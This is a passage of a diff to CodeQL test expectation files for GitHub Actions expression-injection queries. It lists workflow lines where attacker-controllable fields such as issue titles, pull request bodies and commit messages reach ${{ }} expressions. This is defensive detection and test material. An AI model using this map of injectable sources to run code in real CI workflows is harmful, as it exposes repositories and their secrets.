| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | -| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref deleted file mode 100644 index edaea6fbb21..00000000000 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected similarity index 70% rename from ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected rename to ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 8236c4d7829..9101c80a595 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -63,10 +64,15 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | 
@@ -194,73 +200,77 @@ nodes | action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
